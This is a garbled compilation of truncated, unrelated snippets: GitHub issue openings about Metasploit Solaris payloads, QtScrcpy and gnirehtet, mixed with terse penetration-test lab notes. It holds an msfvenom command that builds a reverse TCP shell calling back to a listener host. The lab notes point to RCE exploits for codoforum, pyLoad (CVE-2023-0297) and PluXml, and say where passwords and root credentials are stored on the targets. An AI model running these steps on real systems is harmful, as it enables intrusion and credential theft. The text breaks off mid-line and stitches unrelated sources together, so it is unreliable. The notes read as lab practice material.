-
The `solaris/x86/shell_reverse_tcp` and `solaris/x86/shell_bind_tcp` payloads segfault on Solaris 11.1.
```
./msfvenom -f elf -p solaris/x86/shell_reverse_tcp LHOST=172.16.191.244 LPORT=1337 > rev…
-
This issue is not present in the Windows build of QtScrcpy.
Clicking "start server" on the only device present on the list will print "start server..." in the log, then nothing happens. Nothing els…
-
Keypoints:
- Some windows OS doesn't support wget, powershell
- Some windows OS in the target host is 32bit --> so nc64.exe doesn't work
- upload revere shell file to FTP
- [PE] windows server 200…
-
This can cause issues when trying to write scripts that reside outside the project's directory.
```
$ ./gnirehtet/gnirehtet rt
Starting gnirehtet...
'adb' reverse tcp:31416 tcp:31416
'adb' shel…
-
Key points:
- codoforum --> Remote Code Execution (RCE) 50978.py (but, finally we upload reverse php file manually)
- password is in /var/www/html/sites/default/config.php
-
Keypoints:
- [PE] rpc.py -> https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py
-
Where to get back the shell?
windows/meterpreter/reverse_tcp not working
-
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o)…
-
Keypoints:
- login with pyload:ploady
- pyLoader 0.5.0 -- https://github.com/JacobEbben/CVE-2023-0297
-
Keypoints:
- [PluXml Blog 5.8.9 Remote Code Execution](https://packetstormsecurity.com/files/176407/PluXml-Blog-5.8.9-Remote-Code-Execution.html)
- [PE] root credential info is in /var/mail/www-data…